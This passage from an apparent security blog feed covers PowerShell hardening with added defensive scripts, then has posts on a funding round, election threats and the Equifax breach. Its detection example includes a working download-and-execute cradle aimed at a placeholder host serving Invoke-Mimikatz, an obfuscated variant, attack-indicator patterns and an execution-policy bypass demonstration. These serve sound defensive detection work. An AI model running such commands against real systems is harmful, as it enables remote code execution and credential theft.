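#    variables can remove it. Use Device Guard/AppLocker (practice 2) to enforce.
[Environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')

# 3. Verify from a fresh process (the current one keeps its old mode).
powershell.exe -NoProfile -Command '$ExecutionContext.SessionState.LanguageMode'
```

    The probe reports ConstrainedLanguage, a blocked WebClient and a working [math] call; the final command prints ConstrainedLanguage once the variable is set. Run the probe against each script your administrators actually use before step 2, and keep a list of the ones that fail so they can be rewritten or exempted through AppLocker trusted-script rules.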

    2. PowerShell V.5 With AppLocker And Device Guard

    PowerShell v.5 comes with significant embedded security features that make its use more secure for enterprise environments. These security features include:

    • Script block logging. Script block logging records the de-obfuscated PowerShell code that the engine actually executes in the event log (event ID 4104 in the Microsoft-Windows-PowerShell/Operational log).
    • System-wide transcripts. System-wide transcription can be enabled via Group Policy and provides an “over the shoulder” transcript file of every PowerShell command and code block executed on a system by every user on that system.
    • Constrained PowerShell. Constrained Language mode (as described above in best practice 1).
    • Antimalware integration (Windows 10). The new Windows 10 Antimalware Scan Interface (AMSI) enables all the scripting engines (PowerShell, VBScript, and JScript) to request analysis of dynamic content: from a script file, typed commands at the command line, and even code downloaded and executed in memory. This enables scanning of PowerShell code before it is executed on the computer.

    In addition, using AppLocker to block executables and scripts from user-writable locations gives better control.

    Device Guard, available on Windows 10 and Windows Server 2016, can enforce Constrained Language Mode and application whitelisting, backed by hardware virtualisation features where the hardware supports them.

    3. Logging PowerShell Activity

    PowerShell logging can be enabled via Group Policy for PowerShell modules:

    • Microsoft.PowerShell.* (e.g., the Microsoft.PowerShell.Management module) – Logs most of PowerShell's core capability (a cmdlet is a lightweight PowerShell command that performs a single function).
    • ActiveDirectory – Logs Active Directory cmdlet use.
    • BITS Transfer – Logs use of Background Intelligent Transfer Service (BITS) cmdlets.
    • CimCmdlets (2012R2/8.1) – Logs cmdlets that interface with Common Information Model (CIM).
    • GroupPolicy – Logs Group Policy cmdlet use.
    • Microsoft.WSMan.Management – Logs cmdlets that manage Web Services for Management (WS-Management) and Windows Remote Management (WinRM).
    • NetAdapter/NetConnection – Logs network-related cmdlets.
    • PSScheduledJob/ScheduledTasks (PSv5) – Logs cmdlets to manage scheduled jobs.
    • ServerManager – Logs Server Manager cmdlet use.
    • SmbShare – Logs Server Message Block (SMB) sharing activity.

    For these logs to be useful, they need to be fed into a central logging system with alerts configured for known attack methods.
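    The machine-level registry settings behind the Group Policy items in best practices 2 and 3 (script block logging, system-wide transcription and module logging), as an added PowerShell example that is not code from the original post. It assumes Windows PowerShell 5.x, an elevated session, and C:\PSTranscripts as the transcript location; the Set-PolicyValue helper is mine.

```powershell
# Added example, not from the original post: the machine-level registry
# settings behind the Group Policy items above (script block logging,
# transcription and module logging), plus a read-back check of event 4104.
# Run elevated on Windows PowerShell 5.x. C:\PSTranscripts is an assumed path.
$policy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# Helper (not a built-in cmdlet): create the key if needed, then set a value.
function Set-PolicyValue {
    param([string]$Key, [string]$Name, $Value, [string]$Type = 'DWord')
    if (-not (Test-Path $Key)) { New-Item -Path $Key -Force | Out-Null }
    New-ItemProperty -Path $Key -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

# Script block logging: de-obfuscated code is written to
# Microsoft-Windows-PowerShell/Operational as event ID 4104.
Set-PolicyValue "$policy\ScriptBlockLogging" EnableScriptBlockLogging 1

# System-wide transcription: one transcript file per session; the invocation
# header adds a timestamp to every command.
$transcripts = 'C:\PSTranscripts'
if (-not (Test-Path $transcripts)) { New-Item -ItemType Directory -Path $transcripts | Out-Null }
Set-PolicyValue "$policy\Transcription" EnableTranscripting 1
Set-PolicyValue "$policy\Transcription" EnableInvocationHeader 1
Set-PolicyValue "$policy\Transcription" OutputDirectory $transcripts 'String'

# Module logging (event ID 4103). '*' covers every module; the list in best
# practice 3 can be written here instead to narrow it. The value name is
# literally '*', so the .NET registry API is used to avoid wildcard handling.
Set-PolicyValue "$policy\ModuleLogging" EnableModuleLogging 1
$names = 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames'
[Microsoft.Win32.Registry]::SetValue($names, '*', '*')

# Read back. New processes pick the policy up, so generate one script block
# in a child process and then look for its 4104 record.
powershell.exe -NoProfile -Command '1..3 | ForEach-Object { $_ * 2 }' | Out-Null
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 5 |
    Select-Object TimeCreated, @{ n = 'ScriptBlock'; e = { $_.Properties[2].Value } }
```

    The transcript directory should be a location users can write to but not read or delete from (in practice a write-only network share collected by the security team), otherwise an attacker with a foothold simply removes their own transcript. The event log entries are the feed for the central logging system mentioned above.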

    Relevant activity:

    • Downloads via .NET, e.g. (New-Object Net.WebClient).DownloadString(...)
    • Invoke-Expression (and its alias iex)
    • BITS activity 
    • Scheduled Task creation/deletion
    • PowerShell Remoting

    The most reliable way to detect PowerShell attack code is to look for key indicators: code fragments the tool needs in order to run correctly, which survive renaming and cosmetic changes.

    Example: Detecting Invoke-Mimikatz (the in-memory PowerShell port of Mimikatz, a widely used tool for capturing logged-on users' credentials)
    Invoke-Mimikatz event log keyword:

    "System.Reflection.Emit.AssemblyBuilderAccess"
    For obfuscated PowerShell, custom rules should be developed. For example:

    • Look for lots of curly braces { }
    • Look for lots of quote marks ' "

    Both are heavily used by obfuscation techniques and rarely appear in that density in legitimate scripts or normal administrative use.
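    The key-indicator and obfuscation checks above, as an added PowerShell example (not code from the original post) that scores script block text and runs over three constructed sample blocks. The indicator patterns are taken from the lists above; the brace and quote thresholds are my starting values, to be tuned against your own baseline.

```powershell
# Added example, not from the original post: score script blocks against the
# key indicators above plus the two obfuscation heuristics. The sample blocks
# are constructed for illustration; the thresholds are assumptions to tune.
function Test-ScriptBlockIndicators {
    param([Parameter(Mandatory)][string]$ScriptBlockText, [string]$Source = 'sample')

    # Key indicators: code an attack tool needs in order to run at all.
    $indicators = [ordered]@{
        'WebClient download cradle'            = 'Net\.WebClient.*Download(String|File|Data)'
        'Invoke-Expression'                    = '\b(Invoke-Expression|iex)\b'
        'In-memory assembly (Invoke-Mimikatz)' = 'System\.Reflection\.Emit\.AssemblyBuilderAccess'
        'BITS transfer'                        = 'Start-BitsTransfer'
        'Scheduled task'                       = '(Register|Unregister)-ScheduledTask|schtasks(\.exe)?'
        'PowerShell remoting'                  = '\b(Invoke-Command|Enter-PSSession|New-PSSession)\b'
    }
    $hits = @(foreach ($name in $indicators.Keys) {
        if ($ScriptBlockText -imatch $indicators[$name]) { $name }
    })

    # Obfuscation heuristics: density of braces and quote marks per character,
    # so a long legitimate script with a few blocks does not trip the rule.
    $len    = [math]::Max($ScriptBlockText.Length, 1)
    $braces = ([regex]::Matches($ScriptBlockText, '[{}]')).Count / $len
    $quotes = ([regex]::Matches($ScriptBlockText, '["'']')).Count / $len
    $obfuscated = ($braces -gt 0.05) -or ($quotes -gt 0.10)   # assumed thresholds

    [pscustomobject]@{
        Source     = $Source
        Indicators = ($hits -join '; ')
        BraceRatio = [math]::Round($braces, 3)
        QuoteRatio = [math]::Round($quotes, 3)
        Obfuscated = $obfuscated
        Alert      = ($hits.Count -gt 0) -or $obfuscated
    }
}

# Constructed samples (not real log data): a benign admin command, a download
# cradle, and a string-reassembly obfuscation of the same cradle that defeats
# plain keyword matching but not the density heuristics.
$samples = @{
    'admin-benign'    = 'Get-Service -Name Spooler | Restart-Service'
    'download-cradle' = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/Invoke-Mimikatz.ps1")'
    'obfuscated'      = '&("{1}{0}" -f ''EX'',''I'') (("{0}{1}" -f ''Net.Web'',''Client''))'
}
$samples.GetEnumerator() |
    ForEach-Object { Test-ScriptBlockIndicators -ScriptBlockText $_.Value -Source $_.Key } |
    Format-Table -AutoSize

# Against live data: the script block text is Properties[2] of event 4104.
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 500 |
#     ForEach-Object { Test-ScriptBlockIndicators -ScriptBlockText $_.Properties[2].Value -Source $_.TimeCreated } |
#     Where-Object Alert
```

    Only the benign sample comes back without an alert: the cradle matches both the WebClient and Invoke-Expression indicators, while the obfuscated sample matches no indicator at all and is caught purely by its brace and quote density. That is the reason for running both kinds of rule rather than keywords alone.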

    4. Remove PowerShell V.2

    Obviously the security features built into recent PowerShell versions do not apply to v2, which makes it very attractive to adversaries: v2 can be used for the same lateral movement and persistence techniques, and because it lacks the script block logging, module logging and transcription described above, its use leaves far fewer traces. Where the v2 engine is still installed, an attacker only needs to start PowerShell with the -Version 2 switch to downgrade.

    For that and other reasons Microsoft has announced that PowerShell v2 is deprecated starting with the Windows 10 update scheduled for this September, so either way it is highly recommended to check for and remove PowerShell v2 from your environment.

    You can check whether Windows PowerShell 2.0 is installed by running the following (as an administrator).

    • On Windows 8.1/10, where the v2 engine is an optional feature, the following returns a State of either Enabled or Disabled:
      • Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2
    •  On Windows Server, the following will return an InstallState of either Installed or Removed:
      • Get-WindowsFeature PowerShell-V2
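    Removing the v2 engine on both client and server, and checking the event logs for downgrade attempts, as an added PowerShell example (not code from the original post). It assumes an elevated Windows PowerShell 5.x session; the 4688 check only works where process command-line auditing is enabled.

```powershell
# Added example, not from the original post: remove PowerShell 2.0 and look
# for evidence of downgrade attempts. Run elevated on Windows PowerShell 5.x.

# --- Remove the engine ---
if (Get-Command Get-WindowsOptionalFeature -ErrorAction SilentlyContinue) {
    # Windows 10/8.1: the Root feature carries the v2 engine; disabling it
    # removes the child MicrosoftWindowsPowerShellV2 feature as well.
    $v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root
    if ($v2.State -eq 'Enabled') {
        Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart
    }
}
if (Get-Command Get-WindowsFeature -ErrorAction SilentlyContinue) {
    # Windows Server
    if ((Get-WindowsFeature PowerShell-V2).Installed) {
        Uninstall-WindowsFeature -Name PowerShell-V2
    }
}

# --- Detect downgrade attempts ---
# Event 400 ("Engine state is changed from None to Available") in the classic
# Windows PowerShell log records the version of the engine that started.
# A 2.x engine on a host that should only run 5.x is a downgrade.
Get-WinEvent -FilterHashtable @{ LogName = 'Windows PowerShell'; Id = 400 } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'EngineVersion=2\.' } |
    Select-Object TimeCreated, @{ n = 'Engine'; e = { [regex]::Match($_.Message, 'EngineVersion=\S+').Value } }

# Process creation with "-Version 2" or "-v 2" on the command line is the
# other tell. Requires command-line auditing (event 4688 in the Security log).
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents 2000 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'powershell.*\s-v(ersion)?\s+2\b' } |
    Select-Object TimeCreated, @{ n = 'CommandLine'; e = { ($_.Message -split "`r?`n") -match 'Process Command Line' } }
```

    Keep the two detection queries running after removal as well: an attempted downgrade on a host without the v2 engine fails, but the attempt itself is still worth an alert.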

    5. Just Enough Administration – JEA

    Just Enough Administration (JEA) ships with the latest updates of Windows Management Framework 5.0 and 5.1. It is a security technology that helps organizations enforce information security by restricting IT administrative rights: JEA provides a practical, role-based approach to defining and automating those restrictions, and reduces the risks of handing out full administrative rights by applying the principle of least privilege.

    JEA is implemented as a Windows PowerShell session endpoint (it requires PS remoting to be enabled), which includes a PowerShell Session Configuration file and one or more Role Capability files.

    • PowerShell Session Configuration file. This file specifies who can connect to an endpoint: users and security groups are mapped to specific management roles. These files are specific to each machine, so access can be controlled per machine. They define the name of the JEA endpoint, which roles are available and, of course, who has access to it. They are PowerShell data files with a .pssc extension.
    • Role Capability files. These files specify what actions users in a particular role can perform. A role can be restricted to a pre-selected set of cmdlets, functions and external programs, which makes running custom, potentially malicious commands practically impossible. Examples of potentially dangerous commands that should be left out are Start-Process, New-Service and Invoke-Item. These are PowerShell data files with a .psrc extension; detailed guidance on creating them is in Microsoft's JEA documentation.
    • JEA configuration samples. Examples and templates can be found in Microsoft's JEA GitHub repository.

    Finally, another significant benefit of JEA is actionable logging and reporting in Windows event log format: every operation performed through a JEA endpoint can be recorded (transcripts and event logs), showing who connected, when, and what changes were made.
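    A complete JEA endpoint built from the three pieces described above (role capability file, session configuration file, registration), as an added PowerShell example that is not from the original post or Microsoft's sample repository. It assumes Windows PowerShell 5.1 with remoting enabled, an elevated session on the managed server, and a domain group CONTOSO\Helpdesk; the module name, role name and paths are placeholders.

```powershell
# Added example, not from the original post: a minimal JEA endpoint that lets
# a help-desk group query services and restart one of them, nothing else.
# Assumes Windows PowerShell 5.1 with remoting enabled, run elevated on the
# managed server. CONTOSO\Helpdesk, the module name and the paths are placeholders.

# 1. Role capability file (.psrc). JEA finds it by file name, so it must sit
#    in a RoleCapabilities folder of a module on $env:PSModulePath.
$modulePath = Join-Path $env:ProgramFiles 'WindowsPowerShell\Modules\HelpdeskJEA'
$rcPath     = Join-Path $modulePath 'RoleCapabilities'
New-Item -ItemType Directory -Path $rcPath -Force | Out-Null
New-ModuleManifest -Path (Join-Path $modulePath 'HelpdeskJEA.psd1')

# Whitelist: Get-Service in full, Restart-Service only with -Name Spooler.
# Anything not listed (Start-Process, New-Service, Invoke-Item, ...) does not
# exist inside the endpoint.
$visible = @(
    'Get-Service'
    @{ Name = 'Restart-Service'; Parameters = @{ Name = 'Name'; ValidateSet = 'Spooler' } }
)
New-PSRoleCapabilityFile -Path (Join-Path $rcPath 'SpoolerOperator.psrc') -VisibleCmdlets $visible

# 2. Session configuration file (.pssc): who maps to which role, and logging.
#    RestrictedRemoteServer gives a NoLanguage session with a handful of
#    harmless defaults; the virtual account means the help-desk user never
#    holds admin rights on the box under their own identity.
$transcripts = 'C:\JEATranscripts'
New-Item -ItemType Directory -Path $transcripts -Force | Out-Null
$pssc = Join-Path $env:TEMP 'Helpdesk.pssc'
New-PSSessionConfigurationFile -Path $pssc `
    -SessionType RestrictedRemoteServer `
    -RunAsVirtualAccount `
    -TranscriptDirectory $transcripts `
    -RoleDefinitions @{ 'CONTOSO\Helpdesk' = @{ RoleCapabilities = 'SpoolerOperator' } }
if (-not (Test-PSSessionConfigurationFile -Path $pssc)) { throw "Invalid session configuration: $pssc" }

# 3. Register the endpoint (this restarts WinRM).
Register-PSSessionConfiguration -Name 'Helpdesk' -Path $pssc -Force | Out-Null

# 4. Check the result on the server: the endpoint exists and its permissions.
Get-PSSessionConfiguration -Name 'Helpdesk' | Select-Object Name, Permission

# From a client, as a member of CONTOSO\Helpdesk:
#   Enter-PSSession -ComputerName <server> -ConfigurationName Helpdesk
#   Get-Command                  # Get-Service, Restart-Service and the defaults only
#   Restart-Service -Name Spooler
#   Restart-Service -Name WinRM  # rejected: WinRM is not in the ValidateSet
```

    The ValidateSet on -Name is what turns "can restart services" into "can restart the print spooler"; without it the help-desk role could restart anything, including security agents. Every session through this endpoint lands in C:\JEATranscripts with the connecting user's identity, which is the audit trail mentioned above.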

    6. Scripts Code Signing

    If PowerShell scripts are used in an enterprise environment, code signing is another control that improves security posture by providing authenticity and integrity. Combined with an execution policy of AllSigned (or RemoteSigned, which only requires signatures on scripts that arrived from the network), set locally or via Group Policy, only digitally signed scripts will run. Two caveats apply. Execution policy is a safety feature rather than a security boundary: it can be overridden per process with -ExecutionPolicy Bypass and does not apply to commands typed or piped into PowerShell. And several past attacks have used malicious files bearing valid digital signatures. Code signing is therefore one more layer, not a standalone control.
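    Signing a script, verifying it, enforcing AllSigned and then demonstrating the bypass mentioned above, as an added PowerShell example (not code from the original post). It assumes Windows PowerShell 5.x on Windows 10 and an elevated session; the self-signed certificate is a lab stand-in for one issued by an enterprise CA, and the file paths are placeholders.

```powershell
# Added example, not from the original post: sign a script, verify it, and see
# what AllSigned does and does not stop. Assumes Windows PowerShell 5.x on
# Windows 10 in an elevated session. The self-signed certificate is lab-only;
# in production use a code-signing certificate from your enterprise CA.

# 1. Lab signing certificate.
$cert = New-SelfSignedCertificate -Type CodeSigningCert -Subject 'CN=Lab Script Signing' `
    -CertStoreLocation Cert:\CurrentUser\My

# For AllSigned to accept the signature the publisher must be trusted on the
# machine: export the public part into Trusted Root and Trusted Publishers.
$cer = Join-Path $env:TEMP 'labsign.cer'
Export-Certificate -Cert $cert -FilePath $cer | Out-Null
Import-Certificate -FilePath $cer -CertStoreLocation Cert:\LocalMachine\Root | Out-Null
Import-Certificate -FilePath $cer -CertStoreLocation Cert:\LocalMachine\TrustedPublisher | Out-Null

# 2. Sign a script and verify the signature.
$script = Join-Path $env:TEMP 'Hello.ps1'
Set-Content -Path $script -Value 'Write-Output "signed script ran"'
Set-AuthenticodeSignature -FilePath $script -Certificate $cert | Out-Null
"After signing:  " + (Get-AuthenticodeSignature -FilePath $script).Status

# Any later edit invalidates the signature; that is the integrity property.
Add-Content -Path $script -Value '# tampered'
"After editing:  " + (Get-AuthenticodeSignature -FilePath $script).Status

# 3. Policy: only signed scripts run from now on.
Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope LocalMachine -Force

# 4. The caveat: execution policy is a safety feature, not a security boundary.
#    It governs script files only and can be overridden per process, so both
#    of these run the tampered script regardless of the policy.
powershell.exe -ExecutionPolicy Bypass -File $script
Get-Content $script | powershell.exe -NoProfile -Command -
```

    Get-AuthenticodeSignature reports Valid after signing and HashMismatch after the edit, so the control does catch tampering with a script that is invoked normally. What it cannot do is stop an attacker who already runs code on the host, which is why it sits alongside logging and Constrained Language Mode rather than replacing them.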


    Because PowerShell is being monitored more and more by the day, adversaries have come up with techniques that evade detection, including:

    • Downgrading to PowerShell v2
    • Hosting the PowerShell engine (System.Management.Automation) from custom .NET code, so that powershell.exe never runs
    • PowerShell obfuscation (for example with Invoke-Obfuscation)

    These are only indicative techniques; further analysis is outside the scope of this document, but the "Logging PowerShell Activity" best practices above will detect most of them.


    The single most significant recommendation, after reviewing most of the attack techniques seen recently, is to upgrade to Windows 10 and PowerShell v5 with all security features enabled, and to remove PowerShell v2. Where that is not immediately feasible, which is the case for most enterprise environments, enabling the built-in security features and extensive logging, focused on the indicators commonly used by attack techniques, should be treated as an equal priority.



    Recognition of Hard Work and Relevance – It’s Time to Go Global Wed, 20 Sep 2017 02:43:25 +0000 The news this morning that Digital Shadows has received $26 million in Series C funding from a number of new investors is testament to the hard work the whole team has put into making Digital Shadows successful and relevant for today’s digital economy.

    Figure 1: Now and then – a look back at an interview from our early days and our latest company video

    The fact that Octopus Ventures, World Innovation Lab, Industry Ventures and all of Digital Shadows’ existing investors are excited to invest in this business, which James Chappell and I started 6 years ago, shows that our drive to manage businesses’ digital risk is resonating with organizations of all sizes who continue to need support managing their online exposure, data loss and the increasingly targeted threats by professional cybercriminals and hacktivists.  I am proud that Digital Shadows is able to operate as an extension of our clients’ internal teams, working on these challenges side by side as partners.

    The more we digitize business and government, the more we risk damage to our brand reputation, loss of intellectual property and exposure of sensitive data either through error, by well-meaning insiders and third parties, or malicious threat actors.

    In this digital world we live in, Digital Shadows’ ability to monitor, manage, and remediate digital risk across the widest range of data sources within the open, deep, and dark web is gaining widespread acceptance, and week by week we see more of the world’s best brands signing up to our service.

    This latest investment, which brings our total funding to almost $50 million, will enable us to grow internationally, particularly in Asia Pacific, and to continue our investment in our market-leading solution, SearchLight. All our new investors have impressive international pedigrees and complement our existing funders perfectly, and we look forward to welcoming Luke Hakes from Octopus Ventures to our Board.

    Over the past six years Digital Shadows has grown and expanded from our original base in the heart of London, to the global stage with more than 140 employees in offices in London, San Francisco and Dallas.

    Figure 2: Images from our San Francisco, Dallas, and London offices

    It’s a long way from the early days when James and I worked hard to bring our vision to life, and it is heartening to see our goal of enabling enterprises to protect and manage their digital assets and reduce their digital risk being embraced by investors, analysts and, of course, customers around the world. I want to personally thank every member of the Digital Shadows team and all of our clients for their efforts in making the company what it has become today. Here’s to the next six years and what they will bring!

    Bringing Down the Wahl: Three Threats to the German Federal Election Thu, 14 Sep 2017 02:28:14 +0000 Hacking has become the bogeyman of political election discourse. In Kenya, the recent presidential election result was forcibly annulled after the opposition alleged voting systems had been hacked. While these claims may be entirely valid, what’s worrying is that no concrete or convincing evidence to prove these allegations has been made public so far. Although not a new phenomenon, ever since the United States presidential election in 2016 the spectre of election interference by hostile nation states, hacktivists or political opponents has embedded itself in the public consciousness, and the fear of vote tampering grows by the day.

    The German federal election takes place on 24 September. Germans vote with pen and paper, and votes are counted by hand, but researchers have allegedly discovered vulnerabilities in the software used to register voting tallies, though it is still unclear whether these could realistically be used to manipulate the election results themselves. Germany also has a long tradition of coalition governments. No party has won an outright majority since 1957, and two out of three of Merkel’s governments since 2005 have been Grand Coalitions with her main political opponent, the Social Democratic Party (SPD). With the German system geared to avoid partisanship, it is extremely difficult for an external power to influence the election and get a particular candidate into office.

    Digital Shadows’ analysis of election activity over the past 12 months suggests that we should look beyond the ballot box to the many other ways attackers can leave their mark on the democratic process. While attacks on physical voting systems are rare, attackers often look to capitalise on weaknesses in the broader political apparatus by targeting individual politicians, party networks or local branch offices. Voters may also be targeted by influence campaigns achieved through the spread of false information online. In the upcoming German election, therefore, we should look out for:

    1. Network intrusions and data leakage.

    As seen in both the United States and French presidential elections, attackers will look to release potentially sensitive files in order to discredit a political candidate. Two days before the French election vote in May 2017, an anonymous user posted emails, documents and photos intended to embarrass Emmanuel Macron to the 4chan message board. The ”Macron Leaks” ended up being relatively ineffectual, though this and the previous leaks by Guccifer 2.0 in the United States election highlight how data leaks are believed to be an effective tactic for influencing the political process.

    Documents used in data leaks are often obtained through an initial network compromise. In the case of Guccifer 2.0, the leaked files were allegedly obtained through a breach of the Democratic National Committee’s servers. German officials fear that sensitive emails stolen from senior lawmakers and politicians by apparent Russian hackers in 2015 could be released to harm Angela Merkel’s campaign. The offices of at least 16 parliamentarians were reportedly compromised in 2015, and in March 2017 think tanks aligned to Merkel’s Christian Democratic Union (CDU) were also purportedly targeted by APT28, an espionage group widely believed to be associated with the Russian intelligence services.

    While allegations of Russian interference are unconfirmed, the fear is that Russia has considerable interest at stake in the outcome of the German election and will conduct network compromises as a means of collecting valuable strategic information. Points of interest include the fraught relationship between Russia, NATO and the EU, as well as the future of the Russo-German economic and commercial relationship – particularly with regards to energy provision – in the wake of the United States Congress’ recent decision to pass increasing international sanctions against Russia due to alleged election interference.

    2. Disinformation campaigns.

    Also known as “fake news”, false information intended to mislead audiences can be distributed via a wide variety of media, including spoof social media accounts and even established online publications. The concern is such that in April 2017 the German cabinet voted on measures that penalize networks that fail to remove defamatory false information, hate speech and other illegal content with a fine of up to €50m.

    German commentators believe most of the disinformation targeting German citizens has focused on immigration policy, which aims to spread xenophobia and undermine Merkel’s previous welcoming of refugees. The German fact-checking website Hoaxmap, for example, was established to identify and refute untrue online claims about refugees:

    Map taken from the Hoaxmap website showing reported instances of false media stories on refugees [Source: Hoaxmap[.]org]

    3. Attacks on local political organizations.

    Attacks against local party branches and regional German parliaments have been reported. The CDU claimed its headquarters in the state of Rhineland-Palatinate experienced “massive attacks” ahead of the televised election debate on 03 September. The parliament network in the state of Saxony-Anhalt was reportedly targeted by a ransomware infection in late August, while the website of the state of North Rhine-Westphalia was the victim of a denial of service (DoS) attack by an extortion actor in July. Although the ransomware and DoS attacks were both probably financially motivated and unrelated to the election, attackers may continue to target local party branches believing that their sites and networks are more susceptible to attack.

    Despite the rhetoric warning of Russian election interference, the supposition that Russia would automatically favor Merkel’s opponent is not as clear cut as it might have been in other recent elections. As mentioned above, Germany and Russia currently share a very strong trading relationship, despite political and diplomatic tensions between the two nations. Also, Merkel’s main opponent, Martin Schulz of the Social Democratic Party (SPD), will not necessarily be more amenable to Russian interests than the incumbent. Firstly, Schulz is a staunch European and was President of the European Parliament from 2012 to 2017. Moreover, Schulz has repeatedly publicly rebuked Russia for its foreign policy: in February, Schulz warned against lifting Russian sanctions over its role in the Ukraine crisis, while in October 2016 he criticized the major role Russia had played in the Syrian civil war.

    While the likely motivations and ambitions of hostile nation states remains unclear, organizations can help protect themselves against many of the techniques described above. Mitigation measures include:

    • Providing adequate phishing training for all staff to lessen the risk of network intrusions and public data leakage
    • Properly securing public facing applications
    • Enforcing strong password security practices to reduce the likelihood of account takeovers, particularly on official social media accounts that can be used to spread disinformation
    • Monitoring for fake or spoofed social media profiles, and typosquats designed to impersonate legitimate websites
    • Remaining sceptical about reported statistics and stories, and attempting to verify them across multiple channels

    Influence campaigns, party network intrusions, and fears of vote hacking are now as central to the election process as traditional campaigning and party broadcasts. It is difficult to measure the impact of these types of attacks, but the mere possibility of election interference has served to further damage confidence in politics, particularly in the Western world. It would be naïve to assume that these fears would dissipate any time soon, especially as fears of election interference have a much longer history than the events of the past 12 months. Nevertheless, it is important that we learn to manage these ever-evolving risks and help maintain the elements of our political and electoral systems that we most cherish, while continuing to iron out their many imperfections.

    An Update on the Equifax Data Breach Wed, 13 Sep 2017 02:17:27 +0000

    The credit reporting agency Equifax reported on September 7th, that it had been breached. On Friday, we outlined what we knew at the time, which was replete with intelligence gaps. Five days have gone by and some of these gaps have now been filled in. Here’s what we know so far, and what we can learn from the Equifax breach.

    Figure 1 – Timeline of events surrounding Equifax breach


    Threat Actor Claims

    There have been at least two claims made by financially-motivated threat actors. One actor had made an extortion attempt and claimed to possess the data, the other offered web shell access to an Equifax server. The credibility of either of the claims was unknown and based on the available evidence the likelihood they were genuine could not be judged.

    1. Extortion attempt

    A Tor hidden service was established around September 8th on which claims were made the owners had compromised the Equifax data and were trying to monetize it. They valued the data at 600 Bitcoin (USD 2.7 million), alleging Equifax executives had amassed USD 3 million in shares by conducting insider trading prior to alerting the public to the breach incident. The operators of the hidden service set a deadline of September 15th for this ransom demand, claiming they would delete the data they possessed if it was paid. If no ransom was paid, the actors said the data would be released publicly. At the time of writing these claims were not confirmed, the site was no longer reachable and the email address had been disabled.

    Figure 2 – Statement on Tor hidden service

    On September 11th, an actor using the same nickname – “pasthole” – claimed on Pastebin that a portion of the data had been sold to an unidentified buyer. The actor also said they were responsible for the Tor hidden service previously used to announce the extortion attempt against Equifax. The email address and PGP key provided in the post gave no direct link between the now-offline Tor hidden service and the Pastebin post. None of the claims in this post could be substantiated at the time of writing.

    2. Web shell access offered for sale

    On September 8th, an actor known as “1×0123” claimed to have gained web shell access to an Equifax server, and subsequently offered this access for sale. In their initial post to their Twitter account, 1×0123 posted a screenshot of what appeared to be a listing of Equifax subdomains allegedly being accessed via the Equifax website. In a follow up post, 1×0123 then claimed to offer access to the web shell in exchange for 1 Bitcoin (BTC) and supplied a Jabber ID for contact. Based on 1×0123’s screenshot, it appeared as though they used the WSO web shell, which is a popular tool among certain hacking communities. We did not detect any evidence of authenticity for the alleged web shell access. The screenshot below shows the post made by the actor, who redacted the screenshot.

    Figure 3 – Claim made by 1×0123

    Apache Struts Touted As The Web Application Vulnerability

    In its breach disclosure, Equifax originally stated only that a web application vulnerability had been exploited, resulting in the data breach. Media reports have since alleged that the vulnerability was in Apache Struts, following the publication of an equity research report by Robert W. Baird & Co., which claimed an Equifax representative had told them Apache Struts was exploited to access the compromised information. None of this could be confirmed at the time of writing.

    Criticisms Leveled Towards Equifax’s Response

    1. Executives sold shares prior to disclosure

    Three Equifax Inc. senior executives were reported to have sold shares collectively worth almost USD 1.8 million shortly after the company discovered the security breach on July 29th. The timing of these sales has led some to question whether the individuals had dumped the shares as a result of the breach. Equifax, however, said the executives had not been informed of the breach incident prior to them selling the shares.

    2. Equifax data breach checker

    Equifax released a service designed to allow individuals to check whether they were implicated in the data breach, but following this there were multiple reports that it was returning incorrect results. A test conducted by the media outlet ZDNet used fake names and social security numbers that returned the result “may have been impacted”. Equifax acknowledged that some consumers who visited the website shortly after it was launched may not have received confirmation they were impacted. It was not known whether the breach checker functioned correctly at the time of writing.

    3. Legal updates

    Following complaints from consumer advocates about Equifax’s terms of service, the company announced that using its TrustedID monitoring service would not result in a user forfeiting their right to join a class action lawsuit against the company in relation to the breach.

    On September 8th, The Register also reported two class action lawsuits had been filed against the company, in Portland, Oregon and North Georgia US District Courts. The lawsuits saw Equifax accused of negligence and violations of the U.S. Fair Credit Reporting Act. The complaint filed in Oregon reportedly sought USD 70 billion in damages for residents of that state alone.


    1. At the time of writing, it was not known exactly how many individuals were impacted by this data breach
    2. Despite the claims made by two threat actors, the individual(s) responsible for this breach and their motivations were unknown
    3. Although Equifax stated a web application vulnerability was exploited, the exact vulnerability exploited is not known.


    The breach has had a demonstrably negative impact on Equifax, both to its reputation and to its finances. As of September 13th, Equifax stock (EFX) is down $31.16 per share since the announcement of the breach. Data breaches frequently increase the scrutiny of a company’s security posture, but the reporting on managers selling their shares, the lawsuits and the way Equifax responded to the breach all likely degraded its brand reputation further.

    The impact of this data breach to individuals largely depends on the motivation of the actors that gained access to it. For financially motivated actors, the exposed information would almost certainly be of high value as part of fraudulent activity; payment card details can be used to make fraudulent purchases, while personally identifiable information (PII) can be used in identity theft. This kind of data is also frequently offered for sale or traded on criminal locations, showing another potential means of profit. The New York Post published an article on September 8th, which said payment card fraud had “unexpectedly” spiked in August 2017. The article cited the co-founder of a fraud prevention service called Forter, who assessed the spike was likely tied to the Equifax breach. The co-founder, Liron Damri, reportedly claimed a 15 percent increase in fraud attempts was detected in August 2017. At the time of writing, there was insufficient evidence to confirm a link between the Equifax breach and the increased fraud levels.

    While debate continues as to whether this was a “zero day” exploit targeting a previously unknown vulnerability or a lapse in patching which caused the breach, the exact nature of the exploit is largely a side-show. The attack lifecycle describes a number of different stages that an attacker needs to traverse in order to successfully achieve its goals:

    1. Initial Reconnaissance
